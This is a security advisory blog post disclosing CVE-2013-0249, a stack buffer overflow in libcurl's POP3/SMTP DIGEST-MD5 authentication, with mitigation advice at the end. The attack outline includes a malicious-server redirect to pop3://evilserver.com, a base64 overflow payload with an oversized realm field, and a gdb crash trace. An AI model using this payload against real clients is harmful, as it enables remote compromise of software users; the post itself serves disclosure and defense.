Comments:"Blog.Volema / cURL buffer overflow"
URL:http://blog.volema.com/curl-rce.html
Volema found remotely exploitable buffer overflow vulnerability in libcurl POP3, SMTP protocol handlers which lead to code execution (RCE). When negotiating SASL DIGEST-MD5 authentication, the function Curl_sasl_create_digest_md5_message() uses the data provided from the server without doing the proper length checks and that data is then appended to a local fixed-size buffer on the stack.
Vendor notified, CVE-2013-0249 relased.
Attack Concept Outline
We have the permissions to send custom HTTP requests with curl. We send request to our http://evilserver.com/
GET/HTTP/1.0Host:evilserver.com
server answers with
HTTP/1.0 302 FoundLocation:pop3://x:x@evilserver.com/.
"smart" curl interpretes redirect and connects to evilserver.com port 110/TCP using POP3 proto. Server answers
curl sends
servers answers with DIGEST-MD5 only
+OKListofcapabilitiesfollowsSASLDIGEST-MD5IMPLEMENTATIONdumbydumbPOP3server
so, libcurl has to send
then server sends the payload
+cmVhbG09IkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBIixub25jZT0iT0E2TUc5dEVRR20yaGgiLHFvcD0iYXV0aCIsYWxnb3JpdGhtPW1kNS1zZXNzLGNoYXJzZXQ9dXRmLTg=
and overflow happens because of fixed realm buffer size
realm="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",nonce="OA6MG9tEQGm2hh",qop="auth",algorithm=md5-sess,charset=utf-8
how it looks in gdb
ProgramreceivedsignalSIGSEGV,Segmentationfault. 0x00007fd2b238298din ?? ()from/lib/x86_64-linux-gnu/libc.so.6(gdb)bt #0 0x00007fd2b238298din ?? ()from/lib/x86_64-linux-gnu/libc.so.6 #1 0x00007fd2b2a5cc07inCurl_sasl_create_digest_md5_message()from/home/kyprizel/test/curl-7.28.1/lib/.libs/libcurl.so.4 #2 0x4141414141414141in ?? ()... #1469 0x4141414141414141in ?? () #1470 0x656d616e72657375in ?? ()Cannotaccessmemoryataddress 0x7fff63b8b000
Original exploit: pop3d.py.
Mitigation
We recommend to disable protocols other than HTTP(S) in your application using options CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS. libcurl version should be updated.